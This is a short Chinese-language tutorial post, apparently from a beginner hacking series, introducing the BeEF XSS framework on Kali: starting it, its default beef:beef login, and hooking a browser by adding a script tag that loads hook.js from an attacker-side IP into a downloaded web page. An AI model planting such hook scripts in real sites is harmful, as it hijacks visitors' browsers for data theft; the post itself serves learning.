Hacker基础之工具篇 BeEF

今天我们稍微讲一下BeEF的使用，BeEF是一个XSS平台

BeEF

这个工具在Kali已经预装了，我们直接点击就可以打开了

就是这个<牛>

点开之后会跳出一个Terminal来，在Terminal里面有我们很需要的东西

比如我们的Web平台的地址（启动时候就会自动打开）

还有一些进行XSS攻击时候会用到的脚本例子

这个东西就是我们进行XSS攻击的时候要提交的东西~

这里把IP改一下可以了

（这里注意，如果你用的是Kali虚拟机，记得用桥接模式）

当然，这里不一定非要提交这个字符串，我们可以根据实际情况更改一些标签等等

这里简单演示一下，在一个网页里面加入这个script之后

BeEF可以干什么

我们这里随便下载个网站的源码（比如初音社的）

然后编辑这个加入我们的script

<script src="http://192.168.43.204:3000/hook.js"></script>

这样

之后我们在Kali里面打开BeEF的Web界面

默认密码是beef:beef

之后

我们就可以用浏览器打开我们下载的离线HTML了

就可以看到我们的浏览器在线

如果是正在攻击一个IP，你将会在BeEF上看到这些

好了，我们就大概演示BeEF的功能和用途到这里，大家可以熟悉熟悉这个工具的使用，明天我们讲XSS会用到